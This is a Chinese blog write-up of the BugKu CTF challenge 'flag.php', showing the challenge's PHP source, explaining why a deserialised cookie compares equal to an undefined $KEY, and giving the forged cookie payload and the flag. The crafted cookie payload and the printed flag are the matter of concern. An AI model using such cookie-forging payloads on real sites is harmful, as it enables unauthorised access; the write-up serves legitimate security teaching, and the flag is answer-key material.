美文网首页
BugKu - flag.php

BugKu - flag.php

作者: V0W | 来源:发表于2018-07-08 14:27 被阅读0次

flag.php

原题链接

http://120.24.86.145:8002/flagphp/

分析

一开始以为是sql注入,但是因为点击Login怎么都没用,于是知道不是sql注入。
结合提示,hint,想查看hint.txt但是没有,于是想到会不会是传参数,http://120.24.86.145:8002/flagphp/?hint=1得到源码。
接下来是代码审计:

 <?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?> 

代码逻辑就是,传入一个cookie:ISecer,如果ISecer反序列化的结果和KEY相等,就弹出flag。

这里有一个坑,我一直以为,KEY指的是下面的$KEY='ISecer:www.isecer.com';
然后,用它做序列化。
但实际上,并不是,上面的代码不是用下面的KEY,这是两段!!!
上面的KEY=Null

构造序列化字符串

<?php
echo serialize('');
?>

结果
s:0:"";

但是需要注意的一点是,;要url转义。
最后payload为:

Cookie: ISecer=s:0:""%3B

flag

flag{unserialize_by_virink}

知识点

反序列化,hint传参算是积累了一点经验吧

相关文章

  • bugku flag.php

    点进去后,发现login没有用,源码也没有信息,看了提示说是用hint传参数 分析之后就是要让提交的cookie是...

  • BugKu - flag.php

    flag.php 原题链接 http://120.24.86.145:8002/flagphp/ 分析 一开始以为...

  • RSA从原理到ctf解题(解题篇Ⅰ)

    bugku rsa 一道关于rsa常规的ctf题目(来自bugku):链接:https://ctf.bugku.c...

  • 2019-03-31

    Bugku-代码审计 https://ctf.bugku.com/challenges 1、extract变量覆盖...

  • Bugku-CTF题解WEB部分

    去训练一下基础! Bugku地址:https://ctf.bugku.com/challenges 0x01 we...

  • flag.php

    写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 进去之后是一个什么都点不动的页...

  • 2019-04-13

    BUGKU -加密 1、滴答,滴 -... -.- -.-. - ..-. -- .. ... -.-. 很明显是...

  • 武装win10,打造子系统下的kali linux(免虚拟机)

    https://www.bugku.com/jishu/204.html

  • CTF|sqlmap的简单使用

    工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap 示例:BugKu...

  • BugkuCTF flag.php

    一开始找不到突破口,看了别人的wp把hint当作参数http://123.206.87.240:8002/flag...

网友评论

      本文标题:BugKu - flag.php

      本文链接:https://www.haomeiwen.com/subject/fujouftx.html